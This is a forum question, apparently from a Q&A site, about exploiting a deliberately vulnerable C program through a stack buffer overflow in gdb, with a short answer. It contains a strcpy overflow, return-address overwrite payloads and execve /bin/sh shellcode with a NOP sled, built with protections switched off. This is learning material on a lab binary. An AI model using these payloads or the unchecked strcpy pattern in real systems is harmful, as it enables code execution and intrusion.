4

I've created a small vulnerable C program, which normally won't call function overflowed.

 void overflowed(){ printf("%s\n","Hijacked"); } void normally(char * st){ char buffer[80]; strcpy(buffer,st); } int main(int argc, char * argv[]){ normally(argv[1]); printf("%s\n","Regulary executed"); return 0; }

Opened it up in gdb and managed to call function overflowed

 (gdb) disass overflowed Dump of assembler code for function overflowed: 0x08048436 : push %ebp 0x08048437 : mov %esp,%ebp 0x08048439 : push %ebx 0x0804843a : call 0x80484bc 0x0804843f : add $0x1bc1,%eax 0x08048444 : lea -0x1ac0(%eax),%edx 0x0804844a : push %edx 0x0804844b : mov %eax,%ebx 0x0804844d : call 0x8048310 0x08048452 : add $0x4,%esp 0x08048455 : nop 0x08048456 : mov -0x4(%ebp),%ebx 0x08048459 : leave 0x0804845a : ret End of assembler dump. (gdb) run $(python -c "print 'A'*88+'\x36\x84\x04\x08'") Starting program: /root/vuln $(python -c "print 'A'*88+'\x36\x84\x04\x08'") Hijacked Program received signal SIGSEGV, Segmentation fault. 0xbffff500 in ?? () (gdb)

I've set a breakpoint on exit of function normally to check stack so i can see which return address to put. I've made it and the here is the output. I just can figure out why the shellcode won't get execute. Btw shellcode works, tested it already in C program to invoke this shellcode.

 (gdb) run $(python -c "print '\x90'*62+'\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80'+'\xf4\xf2\xff\xbf'") The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/vuln $(python -c "print '\x90'*62+'\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80'+'\xf4\xf2\xff\xbf'") Breakpoint 2, normally (st=0xbffff500 "") at vulnerable.c:11 11 } (gdb) x/25xw $esp0xbffff2f4: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff304: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff314: 0x90909090 0x90909090 0x90909090 0x90909090 0xbffff324: 0x90909090 0x90909090 0x90909090 0xc0319090 0xbffff334: 0x2f685099 0x6868732f 0x6e69622f 0x5350e389 0xbffff344: 0xc031e189 0x80cd0bb0 0xbffff2f4 0xbffff500 0xbffff354: 0x00000000 (gdb) cont Continuing. Program received signal SIGSEGV, Segmentation fault. 0xbffff345 in ?? () (gdb)

ASLR is turned off, compiled with -fno-stack-protector, -z execstack and -no-pie.

Improve this question
0

    1 Answer 1

    Reset to default
    1

    The reason why it failed is because of bad shellcode, i took the one from The Shellcoders Handbook and it worked like charm.

    Improve this answer

      You must log in to answer this question.

      Start asking to get answers

      Find the answer to your question by asking.

      Ask question

      Explore related questions

      See similar questions with these tags.